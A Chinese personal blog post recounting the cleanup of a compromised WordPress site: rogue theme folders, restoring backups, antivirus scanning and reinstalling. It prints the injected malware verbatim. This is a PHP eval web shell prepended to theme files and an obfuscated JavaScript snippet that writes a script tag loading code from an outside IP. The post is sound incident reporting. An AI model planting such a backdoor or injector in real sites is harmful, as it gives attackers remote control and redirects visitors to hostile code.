wordpress博客被攻击挂马处理办法

2017/05/1722:47:49wordpress博客被攻击挂马处理办法已关闭评论 933

我的博客,在5月份初时候,就发现网站被挂马,访问网站,跳转到国外其他网站。这几天有空来除了这个问题。

登陆云服务器,发现安全警告,发现木马文件134个,明白是网页文件被木马感染篡改了。需要恢复网页文件。

wordpress博客被攻击挂马处理办法

wordpress博客被攻击挂马处理办法

登陆FTP,发现wordpress主题目录wp-content/themes下,凭空多出现几个主题。如下图。

wordpress博客被攻击挂马处理办法

删除这些木马文件夹及其文件。

因为我正在使用的frontpen文件夹下面的文件已经被篡改。许多网页文件顶部被恶意添加代码,如下:

<?php @eval($_POST['dd']);?><?php @eval($_POST['dd']);?>

<?php @eval($_POST['dd']);?><?php @eval($_POST['dd']);?>

<?php @eval($_POST['dd']);?><?php @eval($_POST['dd']);?>

<?php @eval($_POST['dd']);?>

处理办法

删除现在主题目录下的左右文件,将原来备份的主题文件恢复到云服务器上。

加强管理员密码 。

至此此次服务器维护完毕,网站访问恢复正常。

不幸的是,第二天网站还是有跳转到国外网站的现象。再想办法解决木马问题。

排查木马文件小技巧:

将服务器上的所有网页文件打包下载到本地,本地打开电脑管家,会自动检测下载后的解压后的文件,若有病毒的话就会有提示的,如下图。

wordpress博客被攻击挂马处理办法

最后将服务器文件下载到本地,被电脑管家识别出为木马文件,再仔细查看多为JS文件,再JS文件最后被恶意添加木马代码:

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

腾讯云,安装主机安全客户端?

[install succ] at time:[Tue May 23 23:48:54 CST 2017]
dir:[/usr/local/sa/agent]
pack:[agent.tgz]
-------------------------------------------------------------------------------
[RESULT] sec-agent install OK

最后,我在重新安装WP,还原模板和相关网页文件,恢复数据库。至此网站的挂马处理完毕。

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin